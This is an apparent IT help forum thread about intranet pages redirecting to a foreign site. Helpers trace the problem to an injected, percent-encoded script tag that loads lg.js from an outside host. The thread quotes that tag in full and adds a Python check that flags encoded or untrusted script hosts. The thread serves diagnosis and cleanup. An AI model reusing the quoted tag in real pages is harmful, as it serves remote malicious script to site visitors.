Web pages are being redirected

Hi All,
It seems that our web pages are being redirected to http://www.365http.cn/tt/logo.htm every time the users try to access an intranet site.
Kronos1.doc
Asked by afsaleh
5 Solutions
 
mrwalker15 commented:
Your DNS cache has been poisoned. Clear the DNS cache from all your DNS servers.

AncientFrib commented:
Ensure there aren't any bad entries for the intranet DNS record on your DNS server.  Run from the command prompt: IPconfig /flushdns on your DNS servers and clients.  Good luck.

afsaleh (Author) commented:
How can I clear the DNS cache on the DNS servers?
 
afsaleh (Author) commented:
Tried running ipconfig /flushdns on both clients and DNS servers, but it did not work.

Hugh Fraser (Consultant) commented:
Make sure you flush the caches on both your internal DNS server, and your firewall's DNS server. Either or both could be poisoned.

If you have the opportunity, you can dump the DNS server's caches before flushing them to check for poisoning. Also, current releases of DNS servers should be resistant to DNS poisoning, so make sure your DNS server is an up-to-date release. If it got poisoned once, it can happen again unless you change something to prevent it.

mrwalker15 commented:
Are you using Microsoft DNS Servers? If so, go to DNS mmc console.

Add or select (highlight it) the server. Right-click and select Clear DNS cache.

mrwalker15 commented:
To help prevent cache poisoning, in the DNS MMC console:

Select the server

Right-click Properties > Advanced tab

Make sure the "Secure cache against pollution" option is set.

Also, if you have a proxy server you may need to clear the cache there too.

afsaleh (Author) commented:
Tried clearing the cache on the DNS server, but the problem remains.

mrwalker15 commented:
Can you post the source code of the webpage in the picture?

Hugh Fraser (Consultant) commented:
Let's verify DNS is actually the issue. From a command shell, do an nslookup for one of your intranet sites that users are having trouble with. What is the response?

afsaleh (Author) commented:
When doing nslookup on a local intranet site, the result is the name of the DNS server.com and its IP address.

Hugh Fraser (Consultant) commented:
You should see something like

Server:            192.168.1.1
Address:      192.168.1.1#53

Name:      www.domain.com
Address: 192.168.1.2

If you resolve an address on the Internet against your DNS server, you should see something like:

nslookup www.google.com
Server:            192.168.1.1
Address:      192.168.1.1#53

Non-authoritative answer:
www.google.com      canonical name = www.l.google.com.
Name:      www.l.google.com
Address: 72.14.205.99
Name:      www.l.google.com
Address: 72.14.205.104
Name:      www.l.google.com
Address: 72.14.205.147
Name:      www.l.google.com
Address: 72.14.205.103

The difference is that you're not the authoritative source for www.google.com

Is this not similar to what you see?

mrwalker15 commented:
Can you post the source code of the webpage.

afsaleh (Author) commented:
When doing the nslookup, I do see the same info as you have displayed, with the exception of the port #.
The first line will refer to the domain controller / DNS controller / WINS server, while the second line refers to the actual application server.

Also please find attached the source code for the webpage.

Thanks
portal.txt

mrwalker15 commented:
Your webpage was hacked.

Please remove the top line.
<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>

That points to w.c88j.cn/lg.js
 
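The injected tag quoted above hides its real host behind percent-encoding. As an added example (not code from the thread), this check decodes every script src in a served page and flags those whose host is percent-encoded or not on an allow-list, which is how a defender can spot this kind of injection in a copy of the page fetched from a client; the sample HTML and the trusted host name are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample of a served page. The first line is the encoded tag quoted
# in the thread; the remaining markup and the intranet host name are made up.
SAMPLE_HTML = """<script language=javascript src=http://%77%2E%63%38%38%6A%2E%63%6E/lg.js></script>
<html><head><title>Portal</title>
<script src="/js/portal.js"></script>
<script src="http://intranet.example.local/common.js"></script>
</head><body>Intranet portal</body></html>"""

# Assumption: hosts the organisation itself serves script from.
TRUSTED_HOSTS = {"intranet.example.local"}

# Matches a <script ...> tag and captures its src value, quoted or not.
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.IGNORECASE)


def find_suspicious_scripts(html, trusted_hosts):
    """Return external script sources whose host is percent-encoded or untrusted."""
    findings = []
    for match in SCRIPT_SRC.finditer(html):
        raw = match.group(1)
        decoded = unquote(raw)                 # %77%2E%63... -> w.c88j.cn
        host = urlsplit(decoded).hostname      # None for relative paths
        if host is None:
            continue                           # same-origin script, not in scope
        encoded_host = "%" in urlsplit(raw).netloc
        if encoded_host or host not in trusted_hosts:
            findings.append({
                "raw": raw,
                "decoded": decoded,
                "host": host,
                "encoded_host": encoded_host,
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_scripts(SAMPLE_HTML, TRUSTED_HOSTS):
        flag = "ENCODED HOST" if finding["encoded_host"] else "UNTRUSTED HOST"
        print(f"{flag}: {finding['raw']} -> {finding['decoded']}")
```

Running the same check against the page as fetched from the server and as fetched from a client shows whether the tag is in the file on disk or is being added in transit.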
afsaleh (Author) commented:
I did remove this line from the script, under view source. It keeps coming back.

mrwalker15 commented:
You need to scan your web server for malware. It must have a process rewriting the line to the web page every time you update it.
Make sure you have all the latest patches available installed as well.

afsaleh (Author) commented:
What is the best scanner for this job? Tried a few, but none of them seems to work.

mrwalker15 commented:
What is your web server?

afsaleh (Author) commented:
Windows 2000 SP4

mrwalker15 commented:
I would recommend Kaspersky AV, Spybot Search and Destroy, and Secunia Software Advisor.

Patch everything up straight away. If possible, turn off external access as this server is infected.

And run away from Windows 2000. It is a security hole!

afsaleh (Author) commented:
Ran Spybot on the server and on the clients. Did not find anything. The application will run fine on the server, but gets hijacked on the clients.

mrwalker15 commented:
Ok, it seems that this is a code injection via ARP spoofing.

Can you see in the IIS logs if users are actually connecting to IIS to browse the webpage?

Hugh Fraser (Consultant) commented:
This is a virus with a payload that downloads a bunch of other code. If you've viewed this page from a browser on your web server, it's infected as well as the clients that view the page.

Shut down the web server before anything else gets infected. This isn't spyware. It's a virus/trojan. As mrwalker15 mentioned, run an anti-virus on the server and the clients. It's recognized by all the major ones. Check out:

http://virscan.org/report/00406cc94d36b929bb659b0241e2219b.html

to make sure your AV is up-to-date for this virus.

afsaleh (Author) commented:
That works, thanks

mrwalker15 commented:
Hi afsaleh,

What did actually work?

afsaleh (Author) commented:
Ran Spybot on both server and clients in safe mode. Also patched the server and clients with the latest security patches.
After rebooting to normal mode, flushed the DNS buffer on both server and client, and re-installed the IE browser.